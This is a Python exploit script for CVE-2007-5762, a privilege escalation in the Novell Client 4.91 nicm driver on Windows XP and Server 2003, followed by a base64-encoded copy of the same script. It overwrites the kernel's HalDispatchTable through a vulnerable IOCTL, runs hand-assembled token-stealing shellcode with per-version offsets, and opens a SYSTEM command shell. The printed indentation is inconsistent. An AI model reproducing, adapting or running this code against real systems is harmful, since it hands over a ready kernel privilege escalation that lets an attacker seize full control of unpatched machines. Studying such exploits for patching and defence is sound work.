# Novell Client 4.91 SP3/4 Privilege escalation exploit
# Download link: http://d...content-available-to-author-only...l.com/Download?buildid=SyZ1G2ti7wU~
#
# SecurityFocus: http://w...content-available-to-author-only...s.com/bid/27209/info
# CVE: http://c...content-available-to-author-only...e.org/cgi-bin/cvename.cgi?name=CVE-2007-5762
# Patch: http://d...content-available-to-author-only...l.com/Download?buildid=4FmI89wOmg4~
#
# Author: sickness@offensive-security.com
# Version Tested: Novell Client 4.91 SP4
# Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1)
# Thanks:
#       - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible.
#       - ryujin for the help while developing the exploit.
 
from ctypes import *
import sys,struct,os
from optparse import OptionParser
 
kernel32 = windll.kernel32
ntdll    = windll.ntdll
Psapi    = windll.Psapi
 
def GetBase(drvname=None):
    EVIL_ARRAY            = 1024
    myarray               = c_ulong * EVIL_ARRAY
    lpImageBase           = myarray()
    cb                    = c_int(1024)
    lpcbNeeded            = c_long()
    drivername_size       = c_long()
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
    for baseaddr in lpImageBase:
        drivername = c_char_p("\x00"*drivername_size.value)
        if baseaddr:
            Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername,
                            drivername_size.value)
            if drvname:
                if drivername.value.lower() == drvname:
                    print "[>] Retrieving %s information." % drvname
                    print "[>] %s base address: %s" % (drvname, hex(baseaddr))
                    return baseaddr
            else:
                if drivername.value.lower().find("krnl") !=-1:
                    print "[>] Retrieving Kernel information."
                    print "[>] Kernel version: ", drivername.value
                    print "[>] Kernel base address: %s" % hex(baseaddr)
                    return (baseaddr, drivername.value)
    return None
 
if __name__ == '__main__':
 
    usage =  "%prog -o <target>"
        parser = OptionParser(usage=usage)
        parser.add_option("-o", type="string",
                  action="store", dest="target_os",
                  help="Available target operating systems: XP, 2K3")
        (options, args) = parser.parse_args()
        OS = options.target_os
        if not OS or OS.upper() not in ['XP','2K3']:
           parser.print_help()
           sys.exit()
        OS = OS.upper()
 
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE = '\\\\.\\nicm'
 
    device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
 
    (krnlbase, kernelver) = GetBase()
    hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
    HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
    HalDispatchTable -= hKernel
    HalDispatchTable += krnlbase
    HalBase = GetBase("hal.dll")
    print "[>] HalDispatchTable address:", hex(HalDispatchTable)
    HalDispatchTable0x4 = HalDispatchTable + 0x4
    HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4
    HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10
 
    if OS == "2K3":
            HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003
            HalpSetSystemInformation   = HalBase + 0x21c60 # Offset for 2003
 
        else:
            HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP
            HalpSetSystemInformation   = HalBase + 0x19436# Offset for XP
 
        print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
        print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
 
    EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
    retn = c_ulong()
    inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite
    inut_size = 0x0
    output_buffer = 0x41414141 # Junk
    output_size = 0x0
 
        # Get offsets
        if OS == "2K3":
            _KPROCESS = "\x38" # Offset for 2003
            _TOKEN    = "\xd8" # Offset for 2003
            _UPID     = "\x94" # Offset for 2003
            _APLINKS  = "\x98" # Offset for 2003
 
        else:
            _KPROCESS = "\x44" # Offset for XP
            _TOKEN    = "\xc8" # Offset for XP
            _UPID     = "\x84" # Offset for XP
            _APLINKS  = "\x88" # Offset for XP
 
        # Restore the pointer
        pointer_restore =   "\x31\xc0" + \
                 "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
                 "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x4)
 
        # Make the evil token stealing
        steal_token =  "\x52"                                 +\
                 "\x53"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x40" + _KPROCESS                 +\
                 "\x8b\xc8"                             +\
                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\
                 "\x89\x1d\x00\x09\x02\x00"             +\
                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                 "\x75\xe8"                             +\
                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x8b\xc1"                             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5b"                                 +\
                 "\x5a"                                 +\
                 "\xc2\x10"
 
        # Build the shellcode
        sc = "\x90" * 100
        sc+= pointer_restore + steal_token
        sc+= "\x90" * 100
 
    if OS == "2K3":
        baseadd    = c_int(0x02a6ba10)
 
    else:
        baseadd    = c_int(0x026e7bb0)
 
    MEMRES     = (0x1000 | 0x2000)
    PAGEEXE    = 0x00000040
    Zero_Bits   = c_int(0)
    RegionSize = c_int(0x1000)
    write    = c_int(0)
 
    dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
 
    if OS == "2K3":
        kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write))
 
    else:
        kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write))
 
    if device_handler:
        print "[>] Sending IOCTL to the driver."
        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)
 
    evil_in  = c_ulong()
    evil_out  = c_ulong()
    evil_in  = 0x1337
    hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out))
    print "[>] Launching shell as SYSTEM."
    os.system("cmd.exe /K cd c:\\windows\\system32")
 

IyBOb3ZlbGwgQ2xpZW50IDQuOTEgU1AzLzQgUHJpdmlsZWdlIGVzY2FsYXRpb24gZXhwbG9pdAojIERvd25sb2FkIGxpbms6IGh0dHA6Ly9kLi4uY29udGVudC1hdmFpbGFibGUtdG8tYXV0aG9yLW9ubHkuLi5sLmNvbS9Eb3dubG9hZD9idWlsZGlkPVN5WjFHMnRpN3dVfgojCiMgU2VjdXJpdHlGb2N1czogaHR0cDovL3cuLi5jb250ZW50LWF2YWlsYWJsZS10by1hdXRob3Itb25seS4uLnMuY29tL2JpZC8yNzIwOS9pbmZvCiMgQ1ZFOiBodHRwOi8vYy4uLmNvbnRlbnQtYXZhaWxhYmxlLXRvLWF1dGhvci1vbmx5Li4uZS5vcmcvY2dpLWJpbi9jdmVuYW1lLmNnaT9uYW1lPUNWRS0yMDA3LTU3NjIKIyBQYXRjaDogaHR0cDovL2QuLi5jb250ZW50LWF2YWlsYWJsZS10by1hdXRob3Itb25seS4uLmwuY29tL0Rvd25sb2FkP2J1aWxkaWQ9NEZtSTg5d09tZzR+CiMKIyBBdXRob3I6IHNpY2tuZXNzQG9mZmVuc2l2ZS1zZWN1cml0eS5jb20KIyBWZXJzaW9uIFRlc3RlZDogTm92ZWxsIENsaWVudCA0LjkxIFNQNAojIFRhcmdldHM6IEV4cGxvaXQgd29ya3Mgb24gYWxsIHNlcnZpY2UgcGFja3Mgb2YgV2luMkszIGFuZCBXaW5YUCAoZXhjZXB0IFdpbmRvd3MgWFAgU1AxKQojIFRoYW5rczoKIyAgICAgICAtIGcwdG1pMWsgZm9yIGhlbHBpbmcgbWUgdGVzdCBvdXQgdGhlIGV4cGxvaXQgb24gYXMgbWFueSB2ZXJzaW9ucyBvZiBXaW5kb3dzIGFzIHBvc3NpYmxlLgojICAgICAgIC0gcnl1amluIGZvciB0aGUgaGVscCB3aGlsZSBkZXZlbG9waW5nIHRoZSBleHBsb2l0LgogCmZyb20gY3R5cGVzIGltcG9ydCAqCmltcG9ydCBzeXMsc3RydWN0LG9zCmZyb20gb3B0cGFyc2UgaW1wb3J0IE9wdGlvblBhcnNlcgogCmtlcm5lbDMyID0gd2luZGxsLmtlcm5lbDMyCm50ZGxsICAgID0gd2luZGxsLm50ZGxsClBzYXBpICAgID0gd2luZGxsLlBzYXBpCiAKZGVmIEdldEJhc2UoZHJ2bmFtZT1Ob25lKToKICAgIEVWSUxfQVJSQVkgICAgICAgICAgICA9IDEwMjQKICAgIG15YXJyYXkgICAgICAgICAgICAgICA9IGNfdWxvbmcgKiBFVklMX0FSUkFZCiAgICBscEltYWdlQmFzZSAgICAgICAgICAgPSBteWFycmF5KCkKICAgIGNiICAgICAgICAgICAgICAgICAgICA9IGNfaW50KDEwMjQpCiAgICBscGNiTmVlZGVkICAgICAgICAgICAgPSBjX2xvbmcoKQogICAgZHJpdmVybmFtZV9zaXplICAgICAgID0gY19sb25nKCkKICAgIGRyaXZlcm5hbWVfc2l6ZS52YWx1ZSA9IDQ4CiAgICBQc2FwaS5FbnVtRGV2aWNlRHJpdmVycyhieXJlZihscEltYWdlQmFzZSksIGNiLCBieXJlZihscGNiTmVlZGVkKSkKICAgIGZvciBiYXNlYWRkciBpbiBscEltYWdlQmFzZToKICAgICAgICBkcml2ZXJuYW1lID0gY19jaGFyX3AoIlx4MDAiKmRyaXZlcm5hbWVfc2l6ZS52YWx1ZSkKICAgICAgICBpZiBiYXNlYWRkcjoKICAgICAgICAgICAgUHNhcGkuR2V0RGV2aWNlRHJpdmVyQmFzZU5hbWVBKGJhc2VhZGRyLCBkcml2ZXJuYW1lLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgZHJpdmVybmFtZV9zaXplLnZhbHVlKQogICAgICAgICAgICBpZiBkcnZuYW1lOgogICAgICAgICAgICAgICAgaWYgZHJpdmVybmFtZS52YWx1ZS5sb3dlcigpID09IGRydm5hbWU6CiAgICAgICAgICAgICAgICAgICAgcHJpbnQgIls+XSBSZXRyaWV2aW5nICVzIGluZm9ybWF0aW9uLiIgJSBkcnZuYW1lCiAgICAgICAgICAgICAgICAgICAgcHJpbnQgIls+XSAlcyBiYXNlIGFkZHJlc3M6ICVzIiAlIChkcnZuYW1lLCBoZXgoYmFzZWFkZHIpKQogICAgICAgICAgICAgICAgICAgIHJldHVybiBiYXNlYWRkcgogICAgICAgICAgICBlbHNlOgogICAgICAgICAgICAgICAgaWYgZHJpdmVybmFtZS52YWx1ZS5sb3dlcigpLmZpbmQoImtybmwiKSAhPS0xOgogICAgICAgICAgICAgICAgICAgIHByaW50ICJbPl0gUmV0cmlldmluZyBLZXJuZWwgaW5mb3JtYXRpb24uIgogICAgICAgICAgICAgICAgICAgIHByaW50ICJbPl0gS2VybmVsIHZlcnNpb246ICIsIGRyaXZlcm5hbWUudmFsdWUKICAgICAgICAgICAgICAgICAgICBwcmludCAiWz5dIEtlcm5lbCBiYXNlIGFkZHJlc3M6ICVzIiAlIGhleChiYXNlYWRkcikKICAgICAgICAgICAgICAgICAgICByZXR1cm4gKGJhc2VhZGRyLCBkcml2ZXJuYW1lLnZhbHVlKQogICAgcmV0dXJuIE5vbmUKIAppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOgogCiAgICB1c2FnZSA9ICAiJXByb2cgLW8gPHRhcmdldD4iCiAgICAgICAgcGFyc2VyID0gT3B0aW9uUGFyc2VyKHVzYWdlPXVzYWdlKQogICAgICAgIHBhcnNlci5hZGRfb3B0aW9uKCItbyIsIHR5cGU9InN0cmluZyIsCiAgICAgICAgICAgICAgICAgIGFjdGlvbj0ic3RvcmUiLCBkZXN0PSJ0YXJnZXRfb3MiLAogICAgICAgICAgICAgICAgICBoZWxwPSJBdmFpbGFibGUgdGFyZ2V0IG9wZXJhdGluZyBzeXN0ZW1zOiBYUCwgMkszIikKICAgICAgICAob3B0aW9ucywgYXJncykgPSBwYXJzZXIucGFyc2VfYXJncygpCiAgICAgICAgT1MgPSBvcHRpb25zLnRhcmdldF9vcwogICAgICAgIGlmIG5vdCBPUyBvciBPUy51cHBlcigpIG5vdCBpbiBbJ1hQJywnMkszJ106CiAgICAgICAgICAgcGFyc2VyLnByaW50X2hlbHAoKQogICAgICAgICAgIHN5cy5leGl0KCkKICAgICAgICBPUyA9IE9TLnVwcGVyKCkKICAgICAKICAgIEdFTkVSSUNfUkVBRCA9IDB4ODAwMDAwMDAKICAgIEdFTkVSSUNfV1JJVEUgPSAweDQwMDAwMDAwCiAgICBPUEVOX0VYSVNUSU5HID0gMHgzCiAgICBERVZJQ0UgPSAnXFxcXC5cXG5pY20nCiAgICAgCiAgICBkZXZpY2VfaGFuZGxlciA9IGtlcm5lbDMyLkNyZWF0ZUZpbGVBKERFVklDRSwgR0VORVJJQ19SRUFEfEdFTkVSSUNfV1JJVEUsIDAsIE5vbmUsIE9QRU5fRVhJU1RJTkcsIDAsIE5vbmUpCiAgICAgCiAgICAoa3JubGJhc2UsIGtlcm5lbHZlcikgPSBHZXRCYXNlKCkKICAgIGhLZXJuZWwgPSBrZXJuZWwzMi5Mb2FkTGlicmFyeUV4QShrZXJuZWx2ZXIsIDAsIDEpCiAgICBIYWxEaXNwYXRjaFRhYmxlID0ga2VybmVsMzIuR2V0UHJvY0FkZHJlc3MoaEtlcm5lbCwgIkhhbERpc3BhdGNoVGFibGUiKQogICAgSGFsRGlzcGF0Y2hUYWJsZSAtPSBoS2VybmVsCiAgICBIYWxEaXNwYXRjaFRhYmxlICs9IGtybmxiYXNlCiAgICBIYWxCYXNlID0gR2V0QmFzZSgiaGFsLmRsbCIpCiAgICBwcmludCAiWz5dIEhhbERpc3BhdGNoVGFibGUgYWRkcmVzczoiLCBoZXgoSGFsRGlzcGF0Y2hUYWJsZSkKICAgIEhhbERpc3BhdGNoVGFibGUweDQgPSBIYWxEaXNwYXRjaFRhYmxlICsgMHg0CiAgICBIYWxEaXNwYXRjaFRhYmxlMHg4ID0gSGFsRGlzcGF0Y2hUYWJsZTB4NCArIDB4NAogICAgSGFsRGlzcGF0Y2hUYWJsZV8weDE0ID0gSGFsRGlzcGF0Y2hUYWJsZTB4NCAtIDB4MTAKIAogICAgaWYgT1MgPT0gIjJLMyI6CiAgICAgICAgICAgIEhhbGlRdWVyeVN5c3RlbUluZm9ybWF0aW9uID0gSGFsQmFzZSArIDB4MWZhMWUgIyBPZmZzZXQgZm9yIDIwMDMKICAgICAgICAgICAgSGFscFNldFN5c3RlbUluZm9ybWF0aW9uICAgPSBIYWxCYXNlICsgMHgyMWM2MCAjIE9mZnNldCBmb3IgMjAwMwogCiAgICAgICAgZWxzZToKICAgICAgICAgICAgSGFsaVF1ZXJ5U3lzdGVtSW5mb3JtYXRpb24gPSBIYWxCYXNlICsgMHgxNmJiYSAjIE9mZnNldCBmb3IgWFAKICAgICAgICAgICAgSGFscFNldFN5c3RlbUluZm9ybWF0aW9uICAgPSBIYWxCYXNlICsgMHgxOTQzNiMgT2Zmc2V0IGZvciBYUAogICAgICAgICAgICAgCiAgICAgICAgcHJpbnQgIls+XSBIYWxpUXVlcnlTeXN0ZW1JbmZvcm1hdGlvbiBhZGRyZXNzOiIsIGhleChIYWxpUXVlcnlTeXN0ZW1JbmZvcm1hdGlvbikKICAgICAgICBwcmludCAiWz5dIEhhbHBTZXRTeXN0ZW1JbmZvcm1hdGlvbiBhZGRyZXNzOiIsIGhleChIYWxwU2V0U3lzdGVtSW5mb3JtYXRpb24pCiAgICAgCiAgICBFVklMX0lPQ1RMID0gMHgwMDE0M0I2QiAjIFZ1bG5lcmFibGUgSU9DVEwKICAgIHJldG4gPSBjX3Vsb25nKCkKICAgIGludXRfYnVmZmVyID0gSGFsRGlzcGF0Y2hUYWJsZTB4NCAtIDB4MTAgKyAweDMgIyBNYWtlIHRoZSBwd25zYXVjZSBvdmVyd3JpdGUKICAgIGludXRfc2l6ZSA9IDB4MAogICAgb3V0cHV0X2J1ZmZlciA9IDB4NDE0MTQxNDEgIyBKdW5rCiAgICBvdXRwdXRfc2l6ZSA9IDB4MAogCiAgICAgICAgIyBHZXQgb2Zmc2V0cwogICAgICAgIGlmIE9TID09ICIySzMiOgogICAgICAgICAgICBfS1BST0NFU1MgPSAiXHgzOCIgIyBPZmZzZXQgZm9yIDIwMDMKICAgICAgICAgICAgX1RPS0VOICAgID0gIlx4ZDgiICMgT2Zmc2V0IGZvciAyMDAzCiAgICAgICAgICAgIF9VUElEICAgICA9ICJceDk0IiAjIE9mZnNldCBmb3IgMjAwMwogICAgICAgICAgICBfQVBMSU5LUyAgPSAiXHg5OCIgIyBPZmZzZXQgZm9yIDIwMDMKIAogICAgICAgIGVsc2U6CiAgICAgICAgICAgIF9LUFJPQ0VTUyA9ICJceDQ0IiAjIE9mZnNldCBmb3IgWFAKICAgICAgICAgICAgX1RPS0VOICAgID0gIlx4YzgiICMgT2Zmc2V0IGZvciBYUAogICAgICAgICAgICBfVVBJRCAgICAgPSAiXHg4NCIgIyBPZmZzZXQgZm9yIFhQCiAgICAgICAgICAgIF9BUExJTktTICA9ICJceDg4IiAjIE9mZnNldCBmb3IgWFAKIAogICAgICAgICMgUmVzdG9yZSB0aGUgcG9pbnRlcgogICAgICAgIHBvaW50ZXJfcmVzdG9yZSA9ICAgIlx4MzFceGMwIiArIFwKICAgICAgICAgICAgICAgICAiXHhiOCIgKyBzdHJ1Y3QucGFjaygiTCIsIEhhbHBTZXRTeXN0ZW1JbmZvcm1hdGlvbikgKyBcCiAgICAgICAgICAgICAgICAgIlx4YTMiICsgc3RydWN0LnBhY2soIkwiLCBIYWxEaXNwYXRjaFRhYmxlMHg4KSArIFwKICAgICAgICAgICAgICAgICAiXHhiOCIgKyBzdHJ1Y3QucGFjaygiTCIsIEhhbGlRdWVyeVN5c3RlbUluZm9ybWF0aW9uKSArIFwKICAgICAgICAgICAgICAgICAiXHhhMyIgKyBzdHJ1Y3QucGFjaygiTCIsIEhhbERpc3BhdGNoVGFibGUweDQpCiAKICAgICAgICAjIE1ha2UgdGhlIGV2aWwgdG9rZW4gc3RlYWxpbmcKICAgICAgICBzdGVhbF90b2tlbiA9ICAiXHg1MiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICArXAogICAgICAgICAgICAgICAgICJceDUzIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICtcCiAgICAgICAgICAgICAgICAgIlx4MzNceGMwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgK1wKICAgICAgICAgICAgICAgICAiXHg2NFx4OGJceDgwXHgyNFx4MDFceDAwXHgwMCIgICAgICAgICArXAogICAgICAgICAgICAgICAgICJceDhiXHg0MCIgKyBfS1BST0NFU1MgICAgICAgICAgICAgICAgICtcCiAgICAgICAgICAgICAgICAgIlx4OGJceGM4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgK1wKICAgICAgICAgICAgICAgICAiXHg4Ylx4OTgiICsgX1RPS0VOICsgIlx4MDBceDAwXHgwMCIgICArXAogICAgICAgICAgICAgICAgICJceDg5XHgxZFx4MDBceDA5XHgwMlx4MDAiICAgICAgICAgICAgICtcCiAgICAgICAgICAgICAgICAgIlx4OGJceDgwIiArIF9BUExJTktTICsgIlx4MDBceDAwXHgwMCIgK1wKICAgICAgICAgICAgICAgICAiXHg4MVx4ZTgiICsgX0FQTElOS1MgKyAiXHgwMFx4MDBceDAwIiArXAogICAgICAgICAgICAgICAgICJceDgxXHhiOCIgKyBfVVBJRCArICJceDAwXHgwMFx4MDBceDA0XHgwMFx4MDBceDAwIiArXAogICAgICAgICAgICAgICAgICJceDc1XHhlOCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICtcCiAgICAgICAgICAgICAgICAgIlx4OGJceDkwIiArIF9UT0tFTiArICJceDAwXHgwMFx4MDAiICAgK1wKICAgICAgICAgICAgICAgICAiXHg4Ylx4YzEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICArXAogICAgICAgICAgICAgICAgICJceDg5XHg5MCIgKyBfVE9LRU4gKyAiXHgwMFx4MDBceDAwIiAgICtcCiAgICAgICAgICAgICAgICAgIlx4NWIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgK1wKICAgICAgICAgICAgICAgICAiXHg1YSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICArXAogICAgICAgICAgICAgICAgICJceGMyXHgxMCIKIAogICAgICAgICMgQnVpbGQgdGhlIHNoZWxsY29kZQogICAgICAgIHNjID0gIlx4OTAiICogMTAwCiAgICAgICAgc2MrPSBwb2ludGVyX3Jlc3RvcmUgKyBzdGVhbF90b2tlbgogICAgICAgIHNjKz0gIlx4OTAiICogMTAwCiAgICAgCiAgICBpZiBPUyA9PSAiMkszIjoKICAgICAgICBiYXNlYWRkICAgID0gY19pbnQoMHgwMmE2YmExMCkKICAgICAgICAgCiAgICBlbHNlOgogICAgICAgIGJhc2VhZGQgICAgPSBjX2ludCgweDAyNmU3YmIwKQogICAgICAgICAKICAgIE1FTVJFUyAgICAgPSAoMHgxMDAwIHwgMHgyMDAwKQogICAgUEFHRUVYRSAgICA9IDB4MDAwMDAwNDAKICAgIFplcm9fQml0cyAgID0gY19pbnQoMCkKICAgIFJlZ2lvblNpemUgPSBjX2ludCgweDEwMDApCiAgICB3cml0ZSAgICA9IGNfaW50KDApCiAKICAgIGR3U3RhdHVzID0gbnRkbGwuTnRBbGxvY2F0ZVZpcnR1YWxNZW1vcnkoLTEsIGJ5cmVmKGJhc2VhZGQpLCAweDAsIGJ5cmVmKFJlZ2lvblNpemUpLCBNRU1SRVMsIFBBR0VFWEUpCiAgICAgCiAgICBpZiBPUyA9PSAiMkszIjoKICAgICAgICBrZXJuZWwzMi5Xcml0ZVByb2Nlc3NNZW1vcnkoLTEsIDB4MDJhNmJhMTAsIHNjLCAweDEwMDAsIGJ5cmVmKHdyaXRlKSkKICAgICAKICAgIGVsc2U6CiAgICAgICAga2VybmVsMzIuV3JpdGVQcm9jZXNzTWVtb3J5KC0xLCAweDAyNmU3YmIwLCBzYywgMHgxMDAwLCBieXJlZih3cml0ZSkpCiAgICAgICAgIAogICAgaWYgZGV2aWNlX2hhbmRsZXI6CiAgICAgICAgcHJpbnQgIls+XSBTZW5kaW5nIElPQ1RMIHRvIHRoZSBkcml2ZXIuIgogICAgICAgIGRldl9pbyA9IGtlcm5lbDMyLkRldmljZUlvQ29udHJvbChkZXZpY2VfaGFuZGxlciwgRVZJTF9JT0NUTCwgaW51dF9idWZmZXIsIGludXRfc2l6ZSwgb3V0cHV0X2J1ZmZlciwgb3V0cHV0X3NpemUsIGJ5cmVmKHJldG4pLCBOb25lKQogICAgIAogICAgZXZpbF9pbiAgPSBjX3Vsb25nKCkKICAgIGV2aWxfb3V0ICA9IGNfdWxvbmcoKQogICAgZXZpbF9pbiAgPSAweDEzMzcKICAgIGhvbGEgPSBudGRsbC5OdFF1ZXJ5SW50ZXJ2YWxQcm9maWxlKGV2aWxfaW4sIGJ5cmVmKGV2aWxfb3V0KSkKICAgIHByaW50ICJbPl0gTGF1bmNoaW5nIHNoZWxsIGFzIFNZU1RFTS4iCiAgICBvcy5zeXN0ZW0oImNtZC5leGUgL0sgY2QgYzpcXHdpbmRvd3NcXHN5c3RlbTMyIikK